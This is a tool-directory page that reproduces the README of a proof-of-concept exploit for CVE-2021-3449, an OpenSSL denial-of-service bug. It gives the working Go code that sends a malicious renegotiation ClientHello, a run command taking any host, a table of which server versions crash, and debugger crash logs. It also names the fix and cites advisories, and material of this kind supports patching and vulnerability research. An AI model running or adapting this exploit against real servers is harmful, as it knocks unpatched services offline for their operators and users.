Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2021-3449 — CVE-2021-3449 OpenSSL denial-of-service exploit 👨🏻‍💻 | Kitploit
Tools/GitHubGitHub/riptl/cve-2021-3449
Vulnerability AnalysisExploitationWeb SecurityPenetration Testing
GitHubriptl/cve-2021-3449

cve-2021-3449

CVE-2021-3449 OpenSSL denial-of-service exploit 👨🏻‍💻

View Repository
22437185 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2021-3449 OpenSSL <1.1.1k DoS exploit

Usage: go run . -host hostname:port

This program implements a proof-of-concept exploit of CVE-2021-3449 affecting OpenSSL servers pre-1.1.1k if TLSv1.2 secure renegotiation is accepted.

It connects to a TLSv1.2 server and immediately initiates an RFC 5746 "secure renegotiation". The attack involves a maliciously-crafted ClientHello that causes the server to crash by causing a NULL pointer dereference (Denial-of-Service).

References

  • OpenSSL security advisory
  • cve.mitre.org
  • Ubuntu security notice (USN-4891-1)
  • Debian security tracker
  • Red Hat CVE entry

This issue was reported to OpenSSL on 17th March 2021 by Nokia. The fix was developed by Peter Kästle and Samuel Sapalski from Nokia.

Mitigation

The only known fix is to update libssl1.1.

Even though some applications use hardened TLS configurations by default that disable TLS renegotiation, they are still affected by the bug if running an old OpenSSL version.

Exploit

main.go is a tiny script that connects to a TLS server, forces a renegotiation, and disconnects.

The exploit code was injected into a bundled version of the Go 1.14.15 encoding/tls package. You can find it in handshake_client.go:115. The logic is self-explanatory.

// CVE-2021-3449 exploit code.
if hello.vers >= VersionTLS12 {
    if c.handshakes == 0 {
        println("sending initial ClientHello")
        hello.supportedSignatureAlgorithms = supportedSignatureAlgorithms
    } else {
        // OpenSSL pre-1.1.1k runs into a NULL-pointer dereference
        // if the supported_signature_algorithms extension is omitted,
        // but supported_signature_algorithms_cert is present.
        println("sending malicious ClientHello")
        hello.supportedSignatureAlgorithmsCert = supportedSignatureAlgorithms
    }
}

– @terorie

Demo

The demo/ directory holds configuration to patch various apps with a vulnerable version of OpenSSL.

Test setup:

  • Download and compile the vulnerable OpenSSL 1.1.1j version locally
  • Prepare an Ubuntu 20.04 target container and upload the OpenSSL libraries
  • Install application onto target container
  • Start server and execute attack

Requirements:

  • OpenSSL (on the host)
  • build-essential (Perl, GCC, Make)
  • Docker

Note: None of the listed web servers are vulnerable to CVE-2021-3449 with OpenSSL 1.1.1k or later.

ServerDistroVersionDemoResult
OpenSSL s_server-1.1.1jmake demo-opensslCrash
Apache2Ubuntu 18.042.4.29make demo-apache2Partial crash
HAProxyUbuntu 18.041.8.8make demo-haproxyCrash
HAProxyUbuntu 20.042.0.13make demo-haproxyNo effect
lighttpdUbuntu 18.041.4.55make demo-lighttpdCrash
lighttpdUbuntu 20.041.4.55make demo-lighttpdCrash
lighttpdUbuntu 21.041.4.59make demo-lighttpdNo effect with config option
NGINXUbuntu 18.041.14.0make demo-nginxPartial crash
NGINXUbuntu 20.041.18.0make demo-nginxNo effect
Node.js <=12Ubuntu 18.04No effect
Node.js >12Ubuntu 18.04?make demo-nodejsCrash
Node.js >12Ubuntu 18.0415.14.0make demo-nodejsNo effect

To clean up all demo resources, run make clean.

OpenSSL simple server

The openssl s_server is a minimal TLS server implementation.

  • make demo-openssl: Full run (port 4433)
  • make -C demo build-openssl: Build target Docker image
  • make -C demo start-openssl: Start target at port 4433
  • make -C demo stop-openssl: Stop target

Result: Full server crash.

Logs

docker run -d -it --name cve-2021-3449-openssl --network host local/cve-2021-3449/openssl
a16c44f98a37b7e0c0777d3bd66456203de129fd23566d2141ef2bec9777be17
docker logs -f cve-2021-3449-openssl &
sleep 2
warning: Error disabling address space randomization: Operation not permitted
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Using default temp DH parameters
ACCEPT
sending initial ClientHello
connected
sending malicious ClientHello

[[truncated]]

Program received signal SIGSEGV, Segmentation fault.
0x00007f668bd89283 in tls12_shared_sigalgs () from /usr/lib/x86_64-linux-gnu/libssl.so.1.1
#0  0x00007f668bd89283 in tls12_shared_sigalgs () from /usr/lib/x86_64-linux-gnu/libssl.so.1.1
#1  0x00007f668bd893cd in tls1_set_shared_sigalgs () from /usr/lib/x86_64-linux-gnu/libssl.so.1.1
#2  0x00007f668bd89fe3 in tls1_process_sigalgs () from /usr/lib/x86_64-linux-gnu/libssl.so.1.1
#3  0x00007f668bd8a110 in tls1_set_server_sigalgs () from /usr/lib/x86_64-linux-gnu/libssl.so.1.1
#4  0x00007f668bd824a2 in tls_early_post_process_client_hello () from /usr/lib/x86_64-linux-gnu/libssl.so.1.1
#5  0x00007f668bd84d55 in tls_post_process_client_hello () from /usr/lib/x86_64-linux-gnu/libssl.so.1.1
#6  0x00007f668bd8522f in ossl_statem_server_post_process_message () from /usr/lib/x86_64-linux-gnu/libssl.so.1.1
#7  0x00007f668bd710e1 in read_state_machine () from /usr/lib/x86_64-linux-gnu/libssl.so.1.1
#8  0x00007f668bd7199d in state_machine () from /usr/lib/x86_64-linux-gnu/libssl.so.1.1
#9  0x00007f668bd71c4e in ossl_statem_accept () from /usr/lib/x86_64-linux-gnu/libssl.so.1.1
#10 0x00007f668bd493ab in ssl3_read_bytes () from /usr/lib/x86_64-linux-gnu/libssl.so.1.1
#11 0x00007f668bd504ec in ssl3_read_internal () from /usr/lib/x86_64-linux-gnu/libssl.so.1.1
#12 0x00007f668bd50595 in ssl3_read () from /usr/lib/x86_64-linux-gnu/libssl.so.1.1
#13 0x00007f668bd5ae5c in ssl_read_internal () from /usr/lib/x86_64-linux-gnu/libssl.so.1.1
#14 0x00007f668bd5af5b in SSL_read () from /usr/lib/x86_64-linux-gnu/libssl.so.1.1
#15 0x000055aa5a10f209 in sv_body ()
#16 0x000055aa5a1302ec in do_server ()
#17 0x000055aa5a114815 in s_server_main ()
#18 0x000055aa5a0f9395 in do_cmd ()
#19 0x000055aa5a0f9ee1 in main ()
malicious handshake failed, exploit might have worked

Apache2 httpd

Apache2 httpd web server with default configuration is vulnerable.

  • make demo-apache: Full run (port 443)
  • make -C demo build-apache: Build target Docker image
  • make -C demo start-apache: Start target at port 443
  • make -C demo stop-apache: Stop target

Thank you to @binarytrails for the contribution.

Result: Partial disruption, main process still alive but worker process crashed.

Logs

docker run -d -it --name cve-2021-3449-apache2 --network host local/cve-2021-3449/apache2
0bf38dd8ab721f0ae3713448d2a28050b6e7d11fa7e3174b6ec9b1bbcfa124c8
docker logs -f cve-2021-3449-apache2 &

[[truncated]]
Download Tool